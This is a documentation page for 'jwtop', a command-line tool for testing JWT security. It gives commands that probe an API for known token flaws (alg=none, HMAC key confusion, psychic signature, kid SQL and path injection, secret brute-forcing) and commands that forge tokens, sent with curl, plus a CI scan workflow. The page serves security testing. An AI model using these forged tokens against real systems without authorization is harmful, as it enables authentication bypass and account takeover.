Aller au contenu

Test JWT security

Ce contenu n’est pas encore disponible dans votre langue.

JWTop provides two complementary tools for JWT security testing: jwtop crack probes a live server automatically, while jwtop exploit generates modified tokens for manual inspection or targeted tests.

jwtop crack sends a probe for each known exploit technique and reports which ones the server accepts.

Terminal window
jwtop crack $TOKEN --url https://api.example.com/protected

Sample output:

[+] algnone (none) 200 VULNERABLE
[ ] algnone (NONE) 401
[ ] algnone (None) 401
[ ] algnone (nOnE) 401
[ ] blanksecret 401
[ ] nullsig 401
[-] hmacconfusion skipped (no public key provided)
[-] psychicsig skipped (ECDSA-only exploit)
[ ] kidinjection (sql) 401
[ ] kidinjection (path) 401
[-] secret skipped (not found in dictionary)

A [+] line means the server accepted the exploit. Exit code 0 means at least one exploit succeeded; 1 means none did.

Include a public key to enable the hmacconfusion probe:

Terminal window
jwtop crack $TOKEN --url https://api.example.com/protected \
--key /path/to/public.pem
jwtop crack $TOKEN --url https://api.example.com/protected \
--key https://example.com/public.pem

Add a custom secret wordlist:

Terminal window
jwtop crack $TOKEN --url https://api.example.com/protected \
--wordlist /path/to/secrets.txt

Target expects the JWT somewhere other than the Authorization header:

Terminal window
# Cookie
jwtop crack $TOKEN --url https://api.example.com/protected --token-in cookie --token-name session
# Query parameter
jwtop crack $TOKEN --url https://api.example.com/protected --token-in query --token-name access_token
# Form-encoded POST body
jwtop crack $TOKEN --url https://api.example.com/protected --token-in body --token-name jwt

See the crack reference for all --token-in options.

Use jwtop exploit when you need a specific modified token for a targeted test, a report, or a case where the server requires a non-standard request format.

alg=none bypass:

Terminal window
# Single variant
jwtop exploit algnone $TOKEN
# All four capitalisation variants (one per line)
jwtop exploit algnone --all $TOKEN

Blank HMAC secret:

Terminal window
jwtop exploit blanksecret $TOKEN

Null signature (alg unchanged):

Terminal window
jwtop exploit nullsig $TOKEN

HMAC confusion (public key as secret):

Terminal window
jwtop exploit hmacconfusion $TOKEN --key /path/to/public.pem
jwtop exploit hmacconfusion $TOKEN --key https://example.com/public.pem

Psychic signature (all-zero ECDSA signature, CVE-2022-21449):

Terminal window
jwtop exploit psychicsig $TOKEN

kid header injection:

Terminal window
# SQL injection variant
jwtop exploit kidinjection --mode sql $TOKEN
# Path traversal variant
jwtop exploit kidinjection --mode path $TOKEN

Brute-force HMAC secret:

Terminal window
jwtop exploit weaksecret $TOKEN
jwtop exploit weaksecret $TOKEN --wordlist /path/to/secrets.txt

Capture the output and send it as a Bearer token:

Terminal window
EXPLOITED=$(jwtop exploit algnone $TOKEN)
curl -si -H "Authorization: Bearer $EXPLOITED" https://api.example.com/protected \
| head -1

Run a vulnerability scan automatically on every pull request:

name: JWT security scan
on:
pull_request:
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: cerberauth/jwtop-action@v1
with:
args: crack ${{ secrets.TEST_TOKEN }} --url ${{ vars.API_URL }}/protected